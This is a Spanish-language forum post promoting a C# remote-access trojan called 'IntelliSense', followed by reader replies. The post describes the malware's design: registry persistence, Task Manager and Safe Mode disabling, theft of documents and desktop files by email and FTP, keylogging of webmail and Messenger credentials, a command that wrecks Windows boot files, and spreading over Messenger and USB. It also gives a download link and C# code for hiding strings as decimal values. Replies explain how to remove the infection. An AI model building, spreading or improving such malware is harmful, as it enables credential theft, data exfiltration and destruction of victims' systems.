Autor: 43H4FH44H45H4CH49H56H45H
Nombre de la Herramienta:  IntelliSense
Lenguaje: C#.NET
Descripcion:
IntelliSense es una técnica que se me ocurrió para sacar información  y obtener control remoto de una PC o Red enviando ordenes vía web desde cualquier equipo público o privado y cualquier Sistema Operativo con un navegador o cliente FTP.
IntelliSense puede ser aplicado al lenguaje de programación que más nos guste.
Como funciona?
Al iniciar el programa verificara si se encuentra en una cuenta de  Administrador u otro tipo, dependiendo de la cuenta elegirá donde se copiara y si modificara el registro para el auto inicio, deshabilitado del Safe Mode y otras cosas.
Una vez realizada la autocopia listara los archivos que se encuentren en Mis Documentos y el Escritorio para enviarlos vía mail (escogí Gmail para la demostración) a nuestra cuenta además de algunos datos de la víctima. Luego empezara a leer las ordenes web que se encuentren en un archivo "1.txt" que tengamos alojado en alguna pagina web con el siguiente formato:
"PC:ORDEN"
Donde "PC" puede corresponder a la IP pública, IP privada, Nombre de Usuario o Nombre de Usuario de Dominio  para poder enviar la orden a una máquina especifica y si necesitáramos enviarla a todos los PC's se puede usar ALL.
"ORDEN" se refiere a la orden que enviamos a la PC el diseño actual cuenta con
4 ordenes:
CAPTURA: que envía vía mail una captura de pantalla.
KILL: que reemplaza los archivos principales de arranque para evitar el inicio de Windows y reinicia el equipo.
KEYLOG: que envía los datos sustraídos (si los hubiera) de cuentas de correo (páginas en español) como GMAIL, Windows Live Messenger, Hotmail ,Yahoo u otras que especifiquemos.
default: que envía por FTP uno, varios o todos los archivos que queramos utilizando Winrar para comprimirlos, si por ejemplo pusiéramos en la orden:
"*.*" enviara todos los archivos listados
"*.JPG" enviara solo los archivos con dicha extensión.
"documentos.doc" enviara dicho archivo.

Tb cuenta con métodos de protección matando el proceso del Task Manager y si se ingresa a la carpeta donde se encuentre activara la protección igual que con "KILL".
El keylogger solo se activa cuando se ingresa a las páginas que especifiquemos  y cada media hora si hay datos que enviar lo hará vía mail.
En la propagación por Messenger lista todos los contactos que se encuentren en la cuenta actual e ira enviando un link de descarga y una copia de si mismo comprimida a cada contacto, si el contacto esta "conectado" recibirá el link de descarga mas la copia comprimida, en otra caso recibirá solo el link de descarga.
En la replicación por USB listara las carpetas de la unidad USB y las ocultara para luego crear copias de sí mismo con los nombres de dichas carpetas (ya se ha visto en replicación USB).
Además cuenta con la posibilidad de complicar un poco la lectura de los string's utilizados mediante conversión de cada carácter en su valor decimal, para automatizar esto se puede usar un pequeño programa que tenga 3  textBox y un button con el siguiente código:

textBox2.Text = "";
foreach (char a in textBox1.Text)
{
 textBox2.Text +=  Convert.ToInt32(a) + " ";
}
textBox3.Text = @"int[] variable = {" + textBox2.Text.Trim ().Replace(" ", ",") + "};";

string cadena = "";
 
foreach (int i in variable)
{
  cadena  += encod(i);
}
 
 
private string encod(int num)
{
string codif = char.ConvertFromUtf32(num);
return codif;
}

Un ejemplo de su aplicación está  en "private void regist()". Además la modificación al registro permite que la autocopia al sistema tenga cualquier extensión, es decir si se copiara como *.txt igualmente se ejecutaría.

Todavía falta agregar y corregir algunos detalles como detección y captura de cámaras disponibles y algunas cosas más.
Link de descarga del proyecto:


http://www.4shared.com/file/106746397/2040d87e/IntelliSense.html

...

hola hermano a mi me paso lo mismo. jajaj estamos iguales pero tienes dos formas una restaura el sistema. o puedes entrar a cmd en c\windows\system32\cmd y utilisas taskkill para matar los procesos del virus y despues con el comando reg eliminas currnt user y local machine \microsoft\windows\currnt vrsion\policies\  eliminas la clave que dise algo asi como disable taskkmanagr y otra que dice run. y ya esta. reinicias el sistema. si te da ladilla editar el registro buscat un programa por ahi de esos que acomodan el registro solo en sangoogle encontraras. disculpa por lo mal escrito pero el teclado esta malo.

jajajaj

Jamas Respondio x) 

 

  Jeje Tremenda aplicacion y nada mas publico esto del codigo:

 
Para mi que este se levanto hoy con ganas de joderce a unos cuantos y lo logro, yo no se por que rayos descargan aplicaciones sin siquiera ver su codigo fuente . Lo que se acostumbra aqui es publicar puro codigo y si el que postea es de confianza puede darse el lujo de publicar exes..